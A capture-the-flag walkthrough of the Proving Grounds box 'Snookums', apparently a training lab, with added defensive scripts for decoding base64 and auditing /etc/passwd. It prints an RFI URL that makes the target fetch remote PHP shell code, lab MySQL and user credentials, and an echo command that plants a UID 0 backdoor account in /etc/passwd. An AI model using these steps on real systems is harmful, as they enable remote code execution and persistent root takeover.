# Snookums

**Source**: Proving Grounds\
**OS**: Linux\
**Community Rating**: Intermediate

## **Enumeration & Reconnaissance**

* Autorecon revealed open ports:
  * FTP (21)
  * SSH (22)
  * **HTTP (80)**
  * RPC (111)
  * SMB (139 & 445)
  * **MySQL (3306 & 33060)**
* Usually, I’d check FTP first, especially since anonymous login was allowed, but I dove straight into HTTP (80) and got too involved to notice FTP until later.

## **Service Analysis**

* The HTTP server hosted a **Simple PHP Photo Gallery** (v0.8).

<figure><img src="https://2268123139-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FEUwn05Skx1RrmpCLRbWS%2Fuploads%2FyqaOmrCzDgDiuaXgWyS3%2Fimage.png?alt=media&#x26;token=9488a768-cd2e-41b8-81ee-663f6ced1445" alt="" width="563"><figcaption><p>Simple PHP Photo Gallery</p></figcaption></figure>

* A version number at the bottom screamed "vulnerable." Searching for CVEs led me to **EDB-ID 48424** (no CVE assigned), an RFI vulnerability in the `img` parameter:

{% code overflow="wrap" fullWidth="true" %}

```
http://192.168.192.58/image.php?img=http://192.168.45.201/shell.php
```

{% endcode %}

## **Gaining Initial Access**

* I crafted a PHP reverse shell and hosted it on my machine. Initial attempts using ports 901/9911 failed, likely due to firewall rules. Switching to ports 80/22 worked, and I landed a shell as **apache**.

<figure><img src="https://2268123139-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FEUwn05Skx1RrmpCLRbWS%2Fuploads%2FPA4OADAe9T5ZOIoKicyi%2Fimage.png?alt=media&#x26;token=31358442-d85e-4be3-b4e1-e1926e35cc62" alt="" width="563"><figcaption><p>Initial Access</p></figcaption></figure>

* Uploaded `linpeas.sh`, which flagged a PHP config file containing MySQL credentials: **root:MalapropDoffUtilize1337**.

<figure><img src="https://2268123139-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FEUwn05Skx1RrmpCLRbWS%2Fuploads%2FVyGsiCZcr5IJbSKoGWL5%2Fimage.png?alt=media&#x26;token=0a108504-7a30-4300-b911-6097561a197f" alt="" width="375"><figcaption><p>Database Credentials</p></figcaption></figure>

{% code overflow="wrap" fullWidth="true" %}

```bash
mysql -u root -p
```

{% endcode %}

* Found the **SimplePHPGal** database, which contained a users table with 3 users and their encoded passwords. I picked the user **michael**, since that was the account with a home directory on the box.

<figure><img src="https://2268123139-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FEUwn05Skx1RrmpCLRbWS%2Fuploads%2Fl5AsR3jln3JeinWh7UPY%2Fimage.png?alt=media&#x26;token=abee2518-176f-42ec-9fde-98a7768c7149" alt="" width="375"><figcaption><p>Users Passwords</p></figcaption></figure>

{% code overflow="wrap" fullWidth="true" %}

```bash
echo "U0c5amExTjVaRzVsZVVObGNuUnBabmt4TWpNPQ==" | base64 -d | base64 -d
```

{% endcode %}

* Decoding it gave **HockSydneyCertify123**.

<figure><img src="https://2268123139-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FEUwn05Skx1RrmpCLRbWS%2Fuploads%2Fezs8Jc9ppGJNdgSd1oGQ%2Fimage.png?alt=media&#x26;token=8b7f079c-da0f-4e14-a355-d82b014a10ff" alt="" width="563"><figcaption><p><strong>HockSydneyCertify123</strong></p></figcaption></figure>
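The two-step decode above is easy to get wrong by hand, so here is an added helper (my code, not part of the original write-up) that peels nested base64 layers until the output stops being valid base64 or stops being printable text. The input string is the one pulled from the gallery database on this page; the stopping rule is a heuristic, so `max_layers` caps the loop.

```python
import base64
import binascii
import string

# The double-encoded password value taken from the SimplePHPGal users table.
STORED = "U0c5amExTjVaRzVsZVVObGNuUnBabmt4TWpNPQ=="

_B64_CHARS = set(string.ascii_letters + string.digits + "+/=")


def peel_base64(value, max_layers=5):
    """Decode nested base64 until the output is no longer base64.

    Returns (plaintext, layers_removed). A layer is only accepted if it
    decodes to printable ASCII, so the loop stops before turning the real
    plaintext into binary noise.
    """
    current = value.strip()
    layers = 0
    while layers < max_layers:
        # Cheap syntactic checks first: alphabet and length multiple of 4.
        if not current or len(current) % 4 or any(c not in _B64_CHARS for c in current):
            break
        try:
            decoded = base64.b64decode(current, validate=True).decode("ascii")
        except (binascii.Error, UnicodeDecodeError):
            break
        if not decoded.isprintable():
            break
        current, layers = decoded, layers + 1
    return current, layers


if __name__ == "__main__":
    plaintext, depth = peel_base64(STORED)
    print(f"{depth} layer(s) removed -> {plaintext}")
```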

## **Privilege Escalation**

* I then switched to **michael** and re-ran `linpeas.sh`, which revealed a **writable /etc/passwd**.

<figure><img src="https://2268123139-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FEUwn05Skx1RrmpCLRbWS%2Fuploads%2FEHB2CJSyVTTok8Is2zDH%2Fimage.png?alt=media&#x26;token=55a898ee-6540-40af-bf77-e5addc3a8f49" alt="" width="563"><figcaption><p>/etc/passwd</p></figcaption></figure>

* A writable `/etc/passwd` means we can append our own entry with UID 0, i.e. a second root account. I generated a password hash for "pwned":

{% code overflow="wrap" fullWidth="true" %}

```bash
openssl passwd pwned
```

{% endcode %}

<figure><img src="https://2268123139-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FEUwn05Skx1RrmpCLRbWS%2Fuploads%2FzkpzavQqsWWhtL3lJ08B%2Fimage.png?alt=media&#x26;token=2377980b-5b2c-4955-bdc3-164405f1afe7" alt="" width="375"><figcaption><p>openssl passwd</p></figcaption></figure>

* Appended a new root user, kingkong, to `/etc/passwd` using `echo`:

{% code overflow="wrap" fullWidth="true" %}

```bash
echo "kingkong:\$1\$xr7pWWIR\$vNF8Z7sc8mgBu6u7ZETyT/:0:0:root:/root:/bin/bash" >> /etc/passwd
```

{% endcode %}

* Switching to **kingkong** granted root access.

<figure><img src="https://2268123139-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FEUwn05Skx1RrmpCLRbWS%2Fuploads%2FJ5ThdeK0ogq0GLTcxdlW%2Fimage.png?alt=media&#x26;token=9591ceee-c692-496d-8e90-c987d71a733d" alt="" width="563"><figcaption><p>Root Access</p></figcaption></figure>
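From the defender's side, the appended `kingkong` entry is exactly what a passwd audit should catch: a second UID 0 account and a hash sitting in `/etc/passwd` instead of `/etc/shadow`. The script below is an added example (mine, not from the write-up) that parses a constructed passwd file modelled on this box and flags both symptoms, plus a mode check for the world-writable root cause.

```python
import stat

# Constructed sample modelled on the box after the walkthrough's echo command:
# a normal root line, michael's account, and the appended UID 0 backdoor.
SAMPLE_PASSWD = """root:x:0:0:root:/root:/bin/bash
michael:x:1000:1000::/home/michael:/bin/bash
kingkong:$1$xr7pWWIR$vNF8Z7sc8mgBu6u7ZETyT/:0:0:root:/root:/bin/bash
"""

SHADOW_PLACEHOLDERS = {"x", "*", "!", "!!"}


def audit_passwd_text(text):
    """Return (username, reason) findings for suspicious passwd entries."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            findings.append((line, f"line {lineno}: malformed entry ({len(fields)} fields)"))
            continue
        name, pw, uid, _gid, _gecos, _home, _shell = fields
        # Any UID 0 account other than root is a planted superuser.
        if uid == "0" and name != "root":
            findings.append((name, "extra UID 0 account (backdoor root)"))
        # The password field should be a shadow placeholder, never a real hash.
        if pw == "":
            findings.append((name, "empty password field (passwordless login)"))
        elif pw not in SHADOW_PLACEHOLDERS:
            findings.append((name, "password hash stored in /etc/passwd, not /etc/shadow"))
    return findings


def world_writable(mode):
    """True if the st_mode bits grant write access to 'other' (the root cause here)."""
    return bool(mode & stat.S_IWOTH)


if __name__ == "__main__":
    import os
    for who, why in audit_passwd_text(SAMPLE_PASSWD):
        print(f"[!] {who}: {why}")
    print("/etc/passwd world-writable:", world_writable(os.stat("/etc/passwd").st_mode))
```

On a live host, feed the real file's contents to `audit_passwd_text` and its `st_mode` to `world_writable`; a clean system returns no findings and `False`.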

## **Lessons Learned**

* **FTP Blindness:** Skipping FTP can cost time; check the obvious services first.
* **RFI Port Woes:** Firewalls hate fancy ports; stick to 80/443 for shells.
* **Double Encoding:** Always decode twice… or thrice.
* **/etc/passwd Write Abuse:** If it's writable, plant a root user and call it a day.
